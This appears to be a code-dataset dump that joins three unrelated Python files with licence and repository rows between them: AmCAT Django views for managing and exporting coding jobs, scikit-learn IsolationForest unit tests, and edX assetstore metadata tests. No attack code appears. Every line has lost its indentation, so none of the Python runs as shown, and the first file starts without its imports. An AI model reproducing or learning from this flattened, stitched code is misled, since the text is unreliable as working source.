from navigator.views.projectview import ProjectViewMixin, HierarchicalViewMixin, BreadCrumbMixin, ProjectScriptView, \
ProjectActionRedirectView, ProjectEditView, ProjectDetailView, ProjectFormView, ProjectActionFormView, \
ProjectActionForm
from navigator.views.datatableview import DatatableMixin
from amcat.models import CodingJob, Q, Project, ROLE_PROJECT_WRITER
from navigator.utils.misc import session_pop
from navigator.views.project_views import ProjectDetailsView
from api.rest.resources import SearchResource
from amcat.scripts.actions.add_codingjob import AddCodingJob
from amcat.forms.widgets import convert_to_bootstrap_select
from amcat.scripts.actions.get_codingjob_results import CodingjobListForm, GetCodingJobResults
from amcat.models import User
SECTIONS = {
"schemafield": "Field options",
"aggregation": "Aggregation options",
"meta": "Metadata options"
}
class CodingJobListView(HierarchicalViewMixin,ProjectViewMixin, BreadCrumbMixin, DatatableMixin, ListView):
model = CodingJob
parent = ProjectDetailsView
context_category = 'Coding'
resource = CodingJobViewSet
rowlink = './{id}'
def get(self, *args, **kargs):
# TODO: doing this via GET is a *bad* idea. Use a ProjectActionFormView instead.
favaction = self.request.GET.get('favaction')
if (favaction is not None):
ids = {int(id) for id in self.request.GET.getlist('ids')}
CodingJob.objects.filter(pk__in=ids).update(archived=(favaction != "setfav"))
return super(CodingJobListView, self).get(*args, **kargs)
@property
def what(self):
return self.kwargs.get("what", "active")
@classmethod
def get_url_patterns(cls):
patterns = list(super(CodingJobListView, cls).get_url_patterns())
patterns.append(patterns[0][:-1] + "(?P<what>|active|linked|archived)?/?$")
return patterns
def get_datatable(self, **kwargs):
url_kwargs = dict(project=self.project.id)
return super(CodingJobListView, self).get_datatable(url_kwargs=url_kwargs, **kwargs)
def filter_table(self, table):
if self.what == "linked":
table = table.filter(linked_projects=self.project)
else:
table = table.filter(project=self.project, archived=(self.what == "archived"))
return table.hide("project", "articleset", "favourite")
def get_datatable_kwargs(self):
return {"checkboxes": True}
def get_context_data(self, **kwargs):
ctx = super(CodingJobListView, self).get_context_data(**kwargs)
deleted = session_pop(self.request.session, "deleted_codingjob")
added = session_pop(self.request.session, "added_codingjob")
if added:
added = [CodingJob.objects.get(pk=i) for i in added]
what = self.what
favaction = "unsetfav" if what == 'active' else "setfav"
link_form = CodingJobLinkActionForm.get_form_class()(origin_project=self.project, user=self.request.user)
ctx.update(**locals())
return ctx
class CodingJobDetailsView(ProjectDetailView, DatatableMixin):
model = CodingJob
parent = CodingJobListView
resource = SearchResource
rowlink = './{id}'
def filter_table(self, table):
table = table.filter(sets=self.object.articleset.id)
table = table.filter(project=self.project.id)
table = table.rowlink_reverse('navigator:article-details', args=[self.project.id, self.object.articleset.id, '{id}'])
return table
def get_datatable_kwargs(self):
fields = [("col", prop) for prop in ("title", "date", "url")]
used_props = self.object.articleset.get_used_properties()
display_cols = self.project.get_display_columns()
props = [("col", prop) for prop in display_cols if prop in used_props]
return {"extra_args": fields + props}
class CodingJobEditView(ProjectEditView):
parent = CodingJobDetailsView
fields = ['project', 'name', 'coder', 'unitschema', 'articleschema']
def get_form(self, form_class=None):
form = super(CodingJobEditView, self).get_form(form_class)
form.fields['coder'].queryset = User.objects.filter(projectrole__project=self.project)
form.fields['unitschema'].queryset = self.project.get_codingschemas().filter(isarticleschema=False)
form.fields['articleschema'].queryset = self.project.get_codingschemas().filter(isarticleschema=True)
return form
class CodingJobAddView(ProjectScriptView):
parent = CodingJobListView
script = AddCodingJob
url_fragment = "add"
def get_context_data(self, **kwargs):
context = super(CodingJobAddView, self).get_context_data(**kwargs)
return context
def run_form(self, form):
result = super(CodingJobAddView, self).run_form(form)
if isinstance(result, CodingJob): result = [result]
self.request.session['added_codingjob'] = [job.id for job in result]
return result
def get_form_kwargs(self):
kwargs = super(CodingJobAddView, self).get_form_kwargs()
kwargs['project'] = self.project
return kwargs
def get_form(self, form_class=None):
form = super(CodingJobAddView, self).get_form(form_class)
form.fields['insertuser'] = StaticModelChoiceField(self.request.user)
convert_to_bootstrap_select(form)
return form
class CodingJobDeleteView(ProjectActionRedirectView):
parent = CodingJobDetailsView
url_fragment = "delete"
def action(self, project, codingjob):
CodingJob.objects.get(pk=codingjob).recycle()
def get_success_url(self, **kargs):
return reverse(CodingJobListView.get_view_name(), args=[self.project.id])
class CodingJobLinkActionForm(ProjectActionForm):
class form_class(forms.Form):
target_project = forms.ModelChoiceField(Project.objects.all())
codingjobs = forms.ModelMultipleChoiceField(CodingJob.objects.all())
def __init__(self, *args, origin_project, user, **kwargs):
super().__init__(*args, **kwargs)
jobs = CodingJob.objects.all()
self.fields['codingjobs'].queryset = jobs.all_in_project(origin_project)
self.fields['target_project'].queryset = Project.objects.filter(
Q(projectrole__user=user, projectrole__role_id__gte=ROLE_PROJECT_WRITER) | Q(guest_role_id__gte=ROLE_PROJECT_WRITER)
)
def run(self):
codingjobs = self.form.cleaned_data['codingjobs']
target_project = self.form.cleaned_data['target_project']
model = CodingJob.linked_projects.through
vals = codingjobs.values_list('id', 'project').annotate(linked_ids=ArrayAgg('linked_projects'))
objs = (model(codingjob_id=codingjob_id, project=target_project)
for codingjob_id, project_id, linked_ids in vals
if project_id != target_project.id
if target_project.id not in linked_ids)
model.objects.bulk_create(objs)
class CodingJobLinkActionFormView(ProjectActionFormView):
action_form_class = CodingJobLinkActionForm
parent = CodingJobListView
url_fragment = "link-codingjob"
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs['origin_project'] = self.kwargs['project']
kwargs['user'] = self.request.user
return kwargs
def form_valid(self, form):
super().form_valid(form)
project = form.cleaned_data['target_project'].id
return redirect(reverse("navigator:" + CodingJobListView.get_view_name(), args=[project, 'linked']))
class CodingJobUnlinkActionForm(ProjectActionForm):
class form_class(forms.Form):
codingjobs = forms.ModelMultipleChoiceField(CodingJob.objects.all())
def __init__(self, *args, project, **kwargs):
super().__init__(*args, **kwargs)
jobs = CodingJob.objects.all()
self.fields['codingjobs'].queryset = jobs.all_in_project(project)
self.project = project
def run(self):
codingjobs = self.form.cleaned_data['codingjobs']
self.form.project.linked_codingjobs.filter(pk__in=codingjobs).delete()
class CodingJobUnlinkActionFormView(ProjectActionFormView):
action_form_class = CodingJobUnlinkActionForm
parent = CodingJobListView
url_fragment = "unlink-codingjob"
required_project_permission = ROLE_PROJECT_WRITER
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs['project'] = self.project
return kwargs
def form_valid(self, form):
super().form_valid(form)
return redirect(reverse("navigator:" + CodingJobListView.get_view_name(), args=[self.project.id, 'linked']))
class CodingJobExportSelectView(ProjectFormView):
form_class = CodingjobListForm
parent = CodingJobListView
url_fragment = "export-select"
def get_form_kwargs(self):
kwargs = super(CodingJobExportSelectView, self).get_form_kwargs()
kwargs.update(project=self.project)
if "data" in kwargs and "codingjobs" not in kwargs["data"]:
archived = kwargs['data']['what'] != 'active'
all_jobs = self.project.codingjob_set.filter(archived=archived).values_list("id", flat=True)
kwargs["data"] = kwargs["data"].copy()
kwargs["data"].setlist("codingjobs", all_jobs)
return kwargs
def form_valid(self, form):
self.jobs = form.cleaned_data["codingjobs"]
self.level = form.cleaned_data["export_level"]
return super(CodingJobExportSelectView, self).form_valid(form)
def get_success_url(self):
url = reverse("navigator:" + CodingJobExportView.get_view_name(), args=[self.project.id])
if len(self.jobs) < 100:
codingjobs_url = "&".join("codingjobs={}".format(c.id) for c in self.jobs)
else:
codingjobs_url = "use_session=1"
self.request.session['export_job_ids'] = json.dumps([c.id for c in self.jobs])
return "{url}?export_level={self.level}&{codingjobs_url}".format(**locals())
class CodingJobExportView(ProjectScriptView):
script = GetCodingJobResults
parent = CodingJobListView
url_fragment = "export"
template_name = "project/codingjob_export.html"
def read_get(self):
if self.request.GET.get("use_session"):
jobs = json.loads(self.request.session['export_job_ids'])
else:
jobs = self.request.GET.getlist("codingjobs")
level = int(self.request.GET["export_level"])
return jobs, level
def get_form_kwargs(self):
kwargs = super(CodingJobExportView, self).get_form_kwargs()
jobs, level = self.read_get()
kwargs.update(dict(project=self.project.id, codingjobs=jobs, export_level=level))
return kwargs
def get_initial(self):
jobs, level = self.read_get()
return dict(codingjobs=jobs, export_level=level)
def get_context_data(self, **kwargs):
context = super(CodingJobExportView, self).get_context_data(**kwargs)
form = self.get_form()
# Add fields for schema fields
# section : [(id, field, subfields) ..]
sections = OrderedDict()
# fieldname -> subfields reference
subfields = {}
for name in form.fields:
if form[name].is_hidden:
continue
prefix = name.split("_")[0]
section = SECTIONS.get(prefix, "General options")
if prefix == "schemafield" and not name.endswith("_included"):
continue
subfields[name] = []
sections.setdefault(section, []).append((name, form[name], subfields[name]))
# Sort coding fields
if 'Field options' in sections:
sections["Field options"].sort()
# Add subordinate fields
for name in form.fields:
prefix = name.split("_")[0]
if prefix == "schemafield" and not name.endswith("_included"):
subfields[name.rsplit("_", 1)[0] + "_included"].append((name, form[name]))
for flds in subfields.values():
flds.sort()
context['sections'] = sections
return context
def form_valid(self, form):
return self.run_form_delayed(self.project)
| agpl-3.0 |
imaculate/scikit-learn | sklearn/ensemble/tests/test_iforest.py | 9 | 6928 | """
Testing for Isolation Forest algorithm (sklearn.ensemble.iforest).
"""
# Authors: Nicolas Goix <nicolas.goix@telecom-paristech.fr>
# Alexandre Gramfort <alexandre.gramfort@telecom-paristech.fr>
# License: BSD 3 clause
import numpy as np
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_warns_message
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_no_warnings
from sklearn.utils.testing import assert_greater
from sklearn.utils.testing import ignore_warnings
from sklearn.grid_search import ParameterGrid
from sklearn.ensemble import IsolationForest
from sklearn.model_selection import train_test_split
from sklearn.datasets import load_boston, load_iris
from sklearn.utils import check_random_state
from sklearn.metrics import roc_auc_score
from scipy.sparse import csc_matrix, csr_matrix
rng = check_random_state(0)
# load the iris dataset
# and randomly permute it
iris = load_iris()
perm = rng.permutation(iris.target.size)
iris.data = iris.data[perm]
iris.target = iris.target[perm]
# also load the boston dataset
# and randomly permute it
boston = load_boston()
perm = rng.permutation(boston.target.size)
boston.data = boston.data[perm]
boston.target = boston.target[perm]
def test_iforest():
"""Check Isolation Forest for various parameter settings."""
X_train = np.array([[0, 1], [1, 2]])
X_test = np.array([[2, 1], [1, 1]])
grid = ParameterGrid({"n_estimators": [3],
"max_samples": [0.5, 1.0, 3],
"bootstrap": [True, False]})
with ignore_warnings():
for params in grid:
IsolationForest(random_state=rng,
**params).fit(X_train).predict(X_test)
def test_iforest_sparse():
"""Check IForest for various parameter settings on sparse input."""
rng = check_random_state(0)
X_train, X_test, y_train, y_test = train_test_split(boston.data[:50],
boston.target[:50],
random_state=rng)
grid = ParameterGrid({"max_samples": [0.5, 1.0],
"bootstrap": [True, False]})
for sparse_format in [csc_matrix, csr_matrix]:
X_train_sparse = sparse_format(X_train)
X_test_sparse = sparse_format(X_test)
for params in grid:
# Trained on sparse format
sparse_classifier = IsolationForest(
n_estimators=10, random_state=1, **params).fit(X_train_sparse)
sparse_results = sparse_classifier.predict(X_test_sparse)
# Trained on dense format
dense_classifier = IsolationForest(
n_estimators=10, random_state=1, **params).fit(X_train)
dense_results = dense_classifier.predict(X_test)
assert_array_equal(sparse_results, dense_results)
assert_array_equal(sparse_results, dense_results)
def test_iforest_error():
"""Test that it gives proper exception on deficient input."""
X = iris.data
# Test max_samples
assert_raises(ValueError,
IsolationForest(max_samples=-1).fit, X)
assert_raises(ValueError,
IsolationForest(max_samples=0.0).fit, X)
assert_raises(ValueError,
IsolationForest(max_samples=2.0).fit, X)
# The dataset has less than 256 samples, explicitly setting
# max_samples > n_samples should result in a warning. If not set
# explicitly there should be no warning
assert_warns_message(UserWarning,
"max_samples will be set to n_samples for estimation",
IsolationForest(max_samples=1000).fit, X)
assert_no_warnings(IsolationForest(max_samples='auto').fit, X)
assert_no_warnings(IsolationForest(max_samples=np.int64(2)).fit, X)
assert_raises(ValueError, IsolationForest(max_samples='foobar').fit, X)
assert_raises(ValueError, IsolationForest(max_samples=1.5).fit, X)
def test_recalculate_max_depth():
"""Check max_depth recalculation when max_samples is reset to n_samples"""
X = iris.data
clf = IsolationForest().fit(X)
for est in clf.estimators_:
assert_equal(est.max_depth, int(np.ceil(np.log2(X.shape[0]))))
def test_max_samples_attribute():
X = iris.data
clf = IsolationForest().fit(X)
assert_equal(clf.max_samples_, X.shape[0])
clf = IsolationForest(max_samples=500)
assert_warns_message(UserWarning,
"max_samples will be set to n_samples for estimation",
clf.fit, X)
assert_equal(clf.max_samples_, X.shape[0])
clf = IsolationForest(max_samples=0.4).fit(X)
assert_equal(clf.max_samples_, 0.4*X.shape[0])
def test_iforest_parallel_regression():
"""Check parallel regression."""
rng = check_random_state(0)
X_train, X_test, y_train, y_test = train_test_split(boston.data,
boston.target,
random_state=rng)
ensemble = IsolationForest(n_jobs=3,
random_state=0).fit(X_train)
ensemble.set_params(n_jobs=1)
y1 = ensemble.predict(X_test)
ensemble.set_params(n_jobs=2)
y2 = ensemble.predict(X_test)
assert_array_almost_equal(y1, y2)
ensemble = IsolationForest(n_jobs=1,
random_state=0).fit(X_train)
y3 = ensemble.predict(X_test)
assert_array_almost_equal(y1, y3)
def test_iforest_performance():
"""Test Isolation Forest performs well"""
# Generate train/test data
rng = check_random_state(2)
X = 0.3 * rng.randn(120, 2)
X_train = np.r_[X + 2, X - 2]
X_train = X[:100]
# Generate some abnormal novel observations
X_outliers = rng.uniform(low=-4, high=4, size=(20, 2))
X_test = np.r_[X[100:], X_outliers]
y_test = np.array([0] * 20 + [1] * 20)
# fit the model
clf = IsolationForest(max_samples=100, random_state=rng).fit(X_train)
# predict scores (the lower, the more normal)
y_pred = - clf.decision_function(X_test)
# check that there is at most 6 errors (false positive or false negative)
assert_greater(roc_auc_score(y_test, y_pred), 0.98)
def test_iforest_works():
# toy sample (the last two samples are outliers)
X = [[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1], [6, 3], [-4, 7]]
# Test LOF
clf = IsolationForest(random_state=rng, contamination=0.25)
clf.fit(X)
decision_func = - clf.decision_function(X)
pred = clf.predict(X)
# assert detect outliers:
assert_greater(np.min(decision_func[-2:]), np.max(decision_func[:-2]))
assert_array_equal(pred, 6 * [1] + 2 * [-1])
| bsd-3-clause |
zubair-arbi/edx-platform | common/lib/xmodule/xmodule/modulestore/tests/test_assetstore.py | 83 | 34681 | """
Tests for assetstore using any of the modulestores for metadata. May extend to testing the storage options
too.
"""
from datetime import datetime, timedelta
import ddt
from nose.plugins.attrib import attr
import pytz
import unittest
from opaque_keys.edx.keys import CourseKey
from opaque_keys.edx.locator import CourseLocator
from xmodule.assetstore import AssetMetadata
from xmodule.modulestore import ModuleStoreEnum, SortedAssetList, IncorrectlySortedList
from xmodule.modulestore.exceptions import ItemNotFoundError
from xmodule.modulestore.tests.factories import CourseFactory
from xmodule.modulestore.tests.utils import (
MIXED_MODULESTORE_BOTH_SETUP, MODULESTORE_SETUPS,
XmlModulestoreBuilder, MixedModulestoreBuilder
)
class AssetStoreTestData(object):
"""
Shared data for constructing test assets.
"""
now = datetime.now(pytz.utc)
user_id = 144
user_id_long = long(user_id)
user_email = "me@example.com"
asset_fields = (
AssetMetadata.ASSET_BASENAME_ATTR, 'internal_name', 'pathname', 'locked',
'edited_by', 'edited_by_email', 'edited_on', 'created_by', 'created_by_email', 'created_on',
'curr_version', 'prev_version'
)
# pylint: disable=bad-continuation
all_asset_data = (
('pic1.jpg', 'EKMND332DDBK', 'pix/archive', False,
user_id_long, user_email, now + timedelta(seconds=10 * 1), user_id_long, user_email, now, '14', '13'),
('shout.ogg', 'KFMDONSKF39K', 'sounds', True,
user_id, user_email, now + timedelta(seconds=10 * 2), user_id, user_email, now, '1', None),
('code.tgz', 'ZZB2333YBDMW', 'exercises/14', False,
user_id * 2, user_email, now + timedelta(seconds=10 * 3), user_id * 2, user_email, now, 'AB', 'AA'),
('dog.png', 'PUPY4242X', 'pictures/animals', True,
user_id_long * 3, user_email, now + timedelta(seconds=10 * 4), user_id_long * 3, user_email, now, '5', '4'),
('not_here.txt', 'JJJCCC747', '/dev/null', False,
user_id * 4, user_email, now + timedelta(seconds=10 * 5), user_id * 4, user_email, now, '50', '49'),
('asset.txt', 'JJJCCC747858', '/dev/null', False,
user_id * 4, user_email, now + timedelta(seconds=10 * 6), user_id * 4, user_email, now, '50', '49'),
('roman_history.pdf', 'JASDUNSADK', 'texts/italy', True,
user_id * 7, user_email, now + timedelta(seconds=10 * 7), user_id * 7, user_email, now, '1.1', '1.01'),
('weather_patterns.bmp', '928SJXX2EB', 'science', False,
user_id * 8, user_email, now + timedelta(seconds=10 * 8), user_id * 8, user_email, now, '52', '51'),
('demo.swf', 'DFDFGGGG14', 'demos/easy', False,
user_id * 9, user_email, now + timedelta(seconds=10 * 9), user_id * 9, user_email, now, '5', '4'),
)
class TestSortedAssetList(unittest.TestCase):
"""
Tests the SortedAssetList class.
"""
def setUp(self):
super(TestSortedAssetList, self).setUp()
asset_list = [dict(zip(AssetStoreTestData.asset_fields, asset)) for asset in AssetStoreTestData.all_asset_data]
self.sorted_asset_list_by_filename = SortedAssetList(iterable=asset_list)
self.sorted_asset_list_by_last_edit = SortedAssetList(iterable=asset_list, key=lambda x: x['edited_on'])
self.course_key = CourseLocator('org', 'course', 'run')
def test_exception_on_bad_sort(self):
asset_key = self.course_key.make_asset_key('asset', 'pic1.jpg')
with self.assertRaises(IncorrectlySortedList):
__ = self.sorted_asset_list_by_last_edit.find(asset_key)
def test_find(self):
asset_key = self.course_key.make_asset_key('asset', 'asset.txt')
self.assertEquals(self.sorted_asset_list_by_filename.find(asset_key), 0)
asset_key_last = self.course_key.make_asset_key('asset', 'weather_patterns.bmp')
self.assertEquals(
self.sorted_asset_list_by_filename.find(asset_key_last), len(AssetStoreTestData.all_asset_data) - 1
)
@attr('mongo')
@ddt.ddt
class TestMongoAssetMetadataStorage(unittest.TestCase):
"""
Tests for storing/querying course asset metadata.
"""
def setUp(self):
super(TestMongoAssetMetadataStorage, self).setUp()
self.addTypeEqualityFunc(datetime, self._compare_datetimes)
self.addTypeEqualityFunc(AssetMetadata, self._compare_metadata)
self.differents = (('different', 'burn.jpg'),)
self.vrmls = (
('vrml', 'olympus_mons.vrml'),
('vrml', 'ponte_vecchio.vrml'),
)
self.regular_assets = (('asset', 'zippy.png'),)
self.alls = self.differents + self.vrmls + self.regular_assets
def _compare_metadata(self, mdata1, mdata2, msg=None):
"""
So we can use the below date comparison
"""
if type(mdata1) != type(mdata2):
self.fail(self._formatMessage(msg, u"{} is not same type as {}".format(mdata1, mdata2)))
for attr in mdata1.ATTRS_ALLOWED_TO_UPDATE:
self.assertEqual(getattr(mdata1, attr), getattr(mdata2, attr), msg)
def _compare_datetimes(self, datetime1, datetime2, msg=None):
"""
Don't compare microseconds as mongo doesn't encode below milliseconds
"""
if not timedelta(seconds=-1) < datetime1 - datetime2 < timedelta(seconds=1):
self.fail(self._formatMessage(msg, u"{} != {}".format(datetime1, datetime2)))
def _make_asset_metadata(self, asset_loc):
"""
Make a single test asset metadata.
"""
now = datetime.now(pytz.utc)
return AssetMetadata(
asset_loc, internal_name='EKMND332DDBK',
pathname='pictures/historical', contenttype='image/jpeg',
locked=False, fields={'md5': '77631ca4f0e08419b70726a447333ab6'},
edited_by=ModuleStoreEnum.UserID.test, edited_on=now,
created_by=ModuleStoreEnum.UserID.test, created_on=now,
curr_version='v1.0', prev_version='v0.95'
)
def _make_asset_thumbnail_metadata(self, asset_md):
"""
Add thumbnail to the asset_md
"""
asset_md.thumbnail = 'ABC39XJUDN2'
return asset_md
def setup_assets(self, course1_key, course2_key, store=None):
"""
Setup assets. Save in store if given
"""
for i, asset in enumerate(AssetStoreTestData.all_asset_data):
asset_dict = dict(zip(AssetStoreTestData.asset_fields[1:], asset[1:]))
if i in (0, 1) and course1_key:
asset_key = course1_key.make_asset_key('asset', asset[0])
asset_md = AssetMetadata(asset_key, **asset_dict)
if store is not None:
store.save_asset_metadata(asset_md, asset[4])
elif course2_key:
asset_key = course2_key.make_asset_key('asset', asset[0])
asset_md = AssetMetadata(asset_key, **asset_dict)
# Don't save assets 5 and 6.
if store is not None and i not in (4, 5):
store.save_asset_metadata(asset_md, asset[4])
@ddt.data(*MODULESTORE_SETUPS)
def test_save_one_and_confirm(self, storebuilder):
"""
Save the metadata in each store and retrieve it singularly, as all assets, and after deleting all.
"""
with storebuilder.build() as (__, store):
course = CourseFactory.create(modulestore=store)
asset_filename = 'burnside.jpg'
new_asset_loc = course.id.make_asset_key('asset', asset_filename)
# Save the asset's metadata.
new_asset_md = self._make_asset_metadata(new_asset_loc)
store.save_asset_metadata(new_asset_md, ModuleStoreEnum.UserID.test)
# Find the asset's metadata and confirm it's the same.
found_asset_md = store.find_asset_metadata(new_asset_loc)
self.assertIsNotNone(found_asset_md)
self.assertEquals(new_asset_md, found_asset_md)
self.assertEquals(len(store.get_all_asset_metadata(course.id, 'asset')), 1)
@ddt.data(*MODULESTORE_SETUPS)
def test_delete(self, storebuilder):
"""
Delete non-existent and existent metadata
"""
with storebuilder.build() as (__, store):
course = CourseFactory.create(modulestore=store)
new_asset_loc = course.id.make_asset_key('asset', 'burnside.jpg')
# Attempt to delete an asset that doesn't exist.
self.assertEquals(store.delete_asset_metadata(new_asset_loc, ModuleStoreEnum.UserID.test), 0)
self.assertEquals(len(store.get_all_asset_metadata(course.id, 'asset')), 0)
new_asset_md = self._make_asset_metadata(new_asset_loc)
store.save_asset_metadata(new_asset_md, ModuleStoreEnum.UserID.test)
self.assertEquals(store.delete_asset_metadata(new_asset_loc, ModuleStoreEnum.UserID.test), 1)
self.assertEquals(len(store.get_all_asset_metadata(course.id, 'asset')), 0)
@ddt.data(*MODULESTORE_SETUPS)
def test_find_non_existing_assets(self, storebuilder):
"""
Find a non-existent asset in an existing course.
"""
with storebuilder.build() as (__, store):
course = CourseFactory.create(modulestore=store)
new_asset_loc = course.id.make_asset_key('asset', 'burnside.jpg')
# Find existing asset metadata.
asset_md = store.find_asset_metadata(new_asset_loc)
self.assertIsNone(asset_md)
@ddt.data(*MODULESTORE_SETUPS)
def test_get_all_non_existing_assets(self, storebuilder):
"""
Get all assets in an existing course when no assets exist.
"""
with storebuilder.build() as (__, store):
course = CourseFactory.create(modulestore=store)
# Find existing asset metadata.
asset_md = store.get_all_asset_metadata(course.id, 'asset')
self.assertEquals(asset_md, [])
@ddt.data(*MODULESTORE_SETUPS)
def test_find_assets_in_non_existent_course(self, storebuilder):
"""
Find asset metadata from a non-existent course.
"""
with storebuilder.build() as (__, store):
course = CourseFactory.create(modulestore=store)
fake_course_id = CourseKey.from_string("{}nothere/{}nothere/{}nothere".format(
course.id.org, course.id.course, course.id.run
))
new_asset_loc = fake_course_id.make_asset_key('asset', 'burnside.jpg')
# Find asset metadata from non-existent course.
with self.assertRaises(ItemNotFoundError):
store.find_asset_metadata(new_asset_loc)
with self.assertRaises(ItemNotFoundError):
store.get_all_asset_metadata(fake_course_id, 'asset')
@ddt.data(*MODULESTORE_SETUPS)
def test_add_same_asset_twice(self, storebuilder):
"""
Add an asset's metadata, then add it again.
"""
with storebuilder.build() as (__, store):
course = CourseFactory.create(modulestore=store)
new_asset_loc = course.id.make_asset_key('asset', 'burnside.jpg')
new_asset_md = self._make_asset_metadata(new_asset_loc)
# Add asset metadata.
store.save_asset_metadata(new_asset_md, ModuleStoreEnum.UserID.test)
self.assertEquals(len(store.get_all_asset_metadata(course.id, 'asset')), 1)
# Add *the same* asset metadata.
store.save_asset_metadata(new_asset_md, ModuleStoreEnum.UserID.test)
# Still one here?
self.assertEquals(len(store.get_all_asset_metadata(course.id, 'asset')), 1)
@ddt.data(*MODULESTORE_SETUPS)
def test_different_asset_types(self, storebuilder):
"""
Test saving assets with other asset types.
"""
with storebuilder.build() as (__, store):
course = CourseFactory.create(modulestore=store)
new_asset_loc = course.id.make_asset_key('vrml', 'pyramid.vrml')
new_asset_md = self._make_asset_metadata(new_asset_loc)
# Add asset metadata.
store.save_asset_metadata(new_asset_md, ModuleStoreEnum.UserID.test)
self.assertEquals(len(store.get_all_asset_metadata(course.id, 'vrml')), 1)
self.assertEquals(len(store.get_all_asset_metadata(course.id, 'asset')), 0)
@ddt.data(*MODULESTORE_SETUPS)
def test_asset_types_with_other_field_names(self, storebuilder):
"""
Test saving assets using an asset type of 'course_id'.
"""
with storebuilder.build() as (__, store):
course = CourseFactory.create(modulestore=store)
new_asset_loc = course.id.make_asset_key('course_id', 'just_to_see_if_it_still_works.jpg')
new_asset_md = self._make_asset_metadata(new_asset_loc)
# Add asset metadata.
store.save_asset_metadata(new_asset_md, ModuleStoreEnum.UserID.test)
self.assertEquals(len(store.get_all_asset_metadata(course.id, 'course_id')), 1)
self.assertEquals(len(store.get_all_asset_metadata(course.id, 'asset')), 0)
all_assets = store.get_all_asset_metadata(course.id, 'course_id')
self.assertEquals(all_assets[0].asset_id.path, new_asset_loc.path)
@ddt.data(*MODULESTORE_SETUPS)
def test_lock_unlock_assets(self, storebuilder):
"""
Save multiple metadata in each store and retrieve it singularly, as all assets, and after deleting all.
"""
with storebuilder.build() as (__, store):
course = CourseFactory.create(modulestore=store)
new_asset_loc = course.id.make_asset_key('asset', 'burnside.jpg')
new_asset_md = self._make_asset_metadata(new_asset_loc)
store.save_asset_metadata(new_asset_md, ModuleStoreEnum.UserID.test)
locked_state = new_asset_md.locked
# Flip the course asset's locked status.
store.set_asset_metadata_attr(new_asset_loc, "locked", not locked_state, ModuleStoreEnum.UserID.test)
# Find the same course and check its locked status.
updated_asset_md = store.find_asset_metadata(new_asset_loc)
self.assertIsNotNone(updated_asset_md)
self.assertEquals(updated_asset_md.locked, not locked_state)
# Now flip it back.
store.set_asset_metadata_attr(new_asset_loc, "locked", locked_state, ModuleStoreEnum.UserID.test)
reupdated_asset_md = store.find_asset_metadata(new_asset_loc)
self.assertIsNotNone(reupdated_asset_md)
self.assertEquals(reupdated_asset_md.locked, locked_state)
ALLOWED_ATTRS = (
('pathname', '/new/path'),
('internal_name', 'new_filename.txt'),
('locked', True),
('contenttype', 'image/png'),
('thumbnail', 'new_filename_thumb.jpg'),
('fields', {'md5': '5346682d948cc3f683635b6918f9b3d0'}),
('curr_version', 'v1.01'),
('prev_version', 'v1.0'),
('edited_by', 'Mork'),
('edited_on', datetime(1969, 1, 1, tzinfo=pytz.utc)),
)
DISALLOWED_ATTRS = (
('asset_id', 'IAmBogus'),
('created_by', 'Smith'),
('created_on', datetime.now(pytz.utc)),
)
UNKNOWN_ATTRS = (
('lunch_order', 'burger_and_fries'),
('villain', 'Khan')
)
@ddt.data(*MODULESTORE_SETUPS)
def test_set_all_attrs(self, storebuilder):
"""
Save setting each attr one at a time
"""
with storebuilder.build() as (__, store):
course = CourseFactory.create(modulestore=store)
new_asset_loc = course.id.make_asset_key('asset', 'burnside.jpg')
new_asset_md = self._make_asset_metadata(new_asset_loc)
store.save_asset_metadata(new_asset_md, ModuleStoreEnum.UserID.test)
for attribute, value in self.ALLOWED_ATTRS:
# Set the course asset's attribute.
store.set_asset_metadata_attr(new_asset_loc, attribute, value, ModuleStoreEnum.UserID.test)
# Find the same course asset and check its changed attribute.
updated_asset_md = store.find_asset_metadata(new_asset_loc)
self.assertIsNotNone(updated_asset_md)
self.assertIsNotNone(getattr(updated_asset_md, attribute, None))
self.assertEquals(getattr(updated_asset_md, attribute, None), value)
@ddt.data(*MODULESTORE_SETUPS)
def test_set_disallowed_attrs(self, storebuilder):
"""
setting disallowed attrs should fail
"""
with storebuilder.build() as (__, store):
course = CourseFactory.create(modulestore=store)
new_asset_loc = course.id.make_asset_key('asset', 'burnside.jpg')
new_asset_md = self._make_asset_metadata(new_asset_loc)
store.save_asset_metadata(new_asset_md, ModuleStoreEnum.UserID.test)
for attribute, value in self.DISALLOWED_ATTRS:
original_attr_val = getattr(new_asset_md, attribute)
# Set the course asset's attribute.
store.set_asset_metadata_attr(new_asset_loc, attribute, value, ModuleStoreEnum.UserID.test)
# Find the same course and check its changed attribute.
updated_asset_md = store.find_asset_metadata(new_asset_loc)
self.assertIsNotNone(updated_asset_md)
self.assertIsNotNone(getattr(updated_asset_md, attribute, None))
# Make sure that the attribute is unchanged from its original value.
self.assertEquals(getattr(updated_asset_md, attribute, None), original_attr_val)
@ddt.data(*MODULESTORE_SETUPS)
def test_set_unknown_attrs(self, storebuilder):
"""
setting unknown attrs should fail
"""
with storebuilder.build() as (__, store):
course = CourseFactory.create(modulestore=store)
new_asset_loc = course.id.make_asset_key('asset', 'burnside.jpg')
new_asset_md = self._make_asset_metadata(new_asset_loc)
store.save_asset_metadata(new_asset_md, ModuleStoreEnum.UserID.test)
for attribute, value in self.UNKNOWN_ATTRS:
# Set the course asset's attribute.
store.set_asset_metadata_attr(new_asset_loc, attribute, value, ModuleStoreEnum.UserID.test)
# Find the same course and check its changed attribute.
updated_asset_md = store.find_asset_metadata(new_asset_loc)
self.assertIsNotNone(updated_asset_md)
# Make sure the unknown field was *not* added.
with self.assertRaises(AttributeError):
self.assertEquals(getattr(updated_asset_md, attribute), value)
@ddt.data(*MODULESTORE_SETUPS)
def test_save_one_different_asset(self, storebuilder):
"""
saving and deleting things which are not 'asset'
"""
with storebuilder.build() as (__, store):
course = CourseFactory.create(modulestore=store)
asset_key = course.id.make_asset_key('different', 'burn.jpg')
new_asset_thumbnail = self._make_asset_thumbnail_metadata(
self._make_asset_metadata(asset_key)
)
store.save_asset_metadata(new_asset_thumbnail, ModuleStoreEnum.UserID.test)
self.assertEquals(len(store.get_all_asset_metadata(course.id, 'different')), 1)
